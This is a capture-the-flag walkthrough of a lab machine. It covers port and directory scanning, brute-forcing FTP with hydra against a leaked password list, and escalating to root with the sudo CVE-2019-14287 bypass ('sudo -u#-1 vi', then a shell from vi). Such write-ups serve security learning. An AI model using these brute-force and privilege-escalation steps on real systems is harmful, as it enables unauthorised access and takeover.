Nmap

First we scan for open ports

# nmap -p- -T4 -sV -sC 10.10.237.58 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-02 21:56 BST
Nmap scan report for 10.10.237.58
Host is up (0.020s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   1024 a0:8b:6b:78:09:39:03:32:ea:52:4c:20:3e:82:ad:60 (DSA)
|   2048 df:25:d0:47:1f:37:d9:18:81:87:38:76:30:92:65:1f (RSA)
|   256 be:9f:4f:01:4a:44:c8:ad:f5:03:cb:00:ac:8f:49:44 (ECDSA)
|_  256 db:b1:c1:b9:cd:8c:9d:60:4f:f1:98:e2:99:fe:08:03 (ED25519)
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds

Website

The website appears to be the normal apache holding page so lets start with a gobuster scan

# gobuster dir -u http://10.10.237.58 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.237.58
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 277]
/assets               (Status: 301) [Size: 313] [--> http://10.10.237.58/assets/]
/.hta                 (Status: 403) [Size: 277]
/.htaccess            (Status: 403) [Size: 277]
/index.html           (Status: 200) [Size: 7853]
/server-status        (Status: 403) [Size: 277]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================

The unusual thing here is the assets directory. Normally the holding page is self contained. Looking closer at the source of the site we see that it loads the an external stylesheet and that has a hidden comment in it.

When visiting the page we get a javascript popup message and we are then redirected to Youtube and rickrolled. Checking the network tab on the page we can see there is an intermediary page called too.

Whilst the intermediary page is just part of the redirect, there was an additional parameter indicating a hidden directory. We visit the directory and it exists and contains the infamous Lenna image named Hot_babe.png.

Downloading the image and running strings against it reveals some hidden information for ftp.

Eh, you've earned this. Username for FTP is ftpuser
One of these is the password:
Mou+56n%QK8sr
1618B0AUshw1M
A56IpIl%1s02u
vTFbDzX9&Nmu?
FfF~sfu^UQZmT
8FF?iKO27b~V0
ua4W~2-@y7dE$
3j39aMQQ7xFXT
Wb4--CTc4ww*-
u6oY9?nHv84D&
0iBp4W69Gr_Yf
TS*%miyPsGV54
C77O3FIy0c0sd
O14xEhgg0Hxz1
5dpv#Pr$wqH7F
1G8Ucoce1+gS5
0plnI%f0~Jw71
0kLoLzfhqq8u&
kS9pn5yiFGj6d
zeff4#!b5Ib_n
rNT4E4SHDGBkl
...
...
...

FTP

We put all of the passwords from the image into a text file and then use hydra to make short work of finding the correct one.

# hydra -l ftpuser -P ftp-pass.txt 10.10.237.58 ftp
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-08-02 22:36:44
[DATA] max 16 tasks per 1 server, overall 16 tasks, 82 login tries (l:1/p:82), ~6 tries per task
[DATA] attacking ftp://10.10.237.58:21/
[21][ftp] host: 10.10.237.58   login: ftpuser   password: *************
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-08-02 22:36:59

We can now successfully login to ftp with these creds and there is a single file.

# ftp -A ftpuser@10.10.237.58           
Connected to 10.10.237.58.
220 (vsFTPd 3.0.2)
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             758 Jan 23  2020 Eli's_Creds.txt

Downloading the file and looking inside we find a message than looks to be written in Brainfuck. By using an online decoder we can reveal the message.

SSH

Using the discovered creds we login as eli and get a message.

─# ssh eli@10.10.237.58
eli@10.10.237.58's password: 


1 new message
Message from Root to Gwendoline:

"Gwendoline, I am not happy with you. Check our leet s3cr3t hiding place. I've left you a hidden message there"

END MESSAGE

So we run a search on the machine for anything that is s3cr3t. This reveals another message containing Gwendoline’s password.

eli@year-of-the-rabbit:~$ find / -name s3cr3t 2>/dev/null
/usr/games/s3cr3t
eli@year-of-the-rabbit:~$ ls -lah /usr/games/s3cr3t/
total 12K
drwxr-xr-x 2 root root 4.0K Jan 23  2020 .
drwxr-xr-x 3 root root 4.0K Jan 23  2020 ..
-rw-r--r-- 1 root root  138 Jan 23  2020 .th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly!
eli@year-of-the-rabbit:~$ cat /usr/games/s3cr3t/.th1s_m3ss4ag3_15_f0r_gw3nd0l1n3_0nly\! 
Your password is awful, Gwendoline. 
It should be at least 60 characters long! Not just *************
Honestly!

Yours sincerely
   -Root

With these creds we can switch to Gwendoline’s account and get the user flag

eli@year-of-the-rabbit:~$ su - gwendoline
Password: 
gwendoline@year-of-the-rabbit:~$ ls
user.txt
gwendoline@year-of-the-rabbit:~$ cat user.txt 
THM{11************************************53}

Privilege escalation

Checking the sudo permissions of Gwedoline’s account shows that we can launch vi and the specific user flag as any user with password, apart from root.

gwendoline@year-of-the-rabbit:~$ sudo -l
Matching Defaults entries for gwendoline on year-of-the-rabbit:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User gwendoline may run the following commands on year-of-the-rabbit:
    (ALL, !root) NOPASSWD: /usr/bin/vi /home/gwendoline/user.txt

However, checking the sudo version reveals it is an older version that is vulnerable to CVE-2019-14287. There is a way to bypass the user id check listed on exploit db.

gwendoline@year-of-the-rabbit:~$ sudo -V
Sudo version 1.8.10p3
Sudoers policy plugin version 1.8.10p3
Sudoers file grammar version 43
Sudoers I/O plugin version 1.8.10p3

This means we can run vi as root and then by executing !/bin/sh inside vi drop into a shell as root and grab the flag.

gwendoline@year-of-the-rabbit:~$ sudo -u#-1 vi /home/gwendoline/user.txt

# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
THM{8d************************************61}